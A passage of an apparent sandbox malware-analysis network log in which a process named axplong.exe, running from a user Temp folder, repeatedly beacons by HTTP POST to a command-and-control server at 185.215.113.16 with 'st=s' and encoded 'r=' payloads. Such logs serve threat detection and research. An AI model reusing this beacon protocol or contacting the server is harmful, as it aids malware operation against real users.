                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:23.678189039 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:23 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    20192.168.2.656646185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:23.792267084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:24.494514942 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:24.495553017 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:24.722302914 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:24 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    21192.168.2.656647185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:24.848995924 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:25.541349888 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:25.542232990 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:25.763559103 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:25 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    22192.168.2.656648185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:25.901458979 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:26.600758076 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:26.601505995 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:26.828299999 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:26 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    23192.168.2.656649185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:26.948230982 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:27.656364918 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:27.657565117 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:27.884694099 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:27 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    24192.168.2.656650185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:27.997077942 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:28.705816984 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:28.706840992 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:28.935754061 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:28 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    25192.168.2.656651185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:29.057605028 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:29.780584097 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:29.781574965 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:30.012847900 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:29 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    26192.168.2.656652185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:30.120178938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:30.805803061 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:30.806823969 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:31.028837919 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:30 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    27192.168.2.656654185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:31.136713028 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:31.835589886 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:31.836463928 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:32.059149981 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:31 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    28192.168.2.656655185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:32.167040110 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:32.899795055 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:32 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:32.900471926 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:33.136357069 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    29192.168.2.656656185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:33.246207952 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:33.965270042 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:33 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:34.030082941 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:34.254512072 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    30192.168.2.656657185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:34.373275042 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:35.084661007 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:34 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:35.085647106 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 46 46 46 41 30 34 30 43 46 46 44 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFFFA040CFFDFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                    Sep 27, 2024 03:07:35.311625957 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:35 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    31192.168.2.656658185.215.113.16804932C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 03:07:35.434259892 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 03:07:36.134392977 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 27 Sep 2024 01:07:36 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 03:07:36.135288954 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
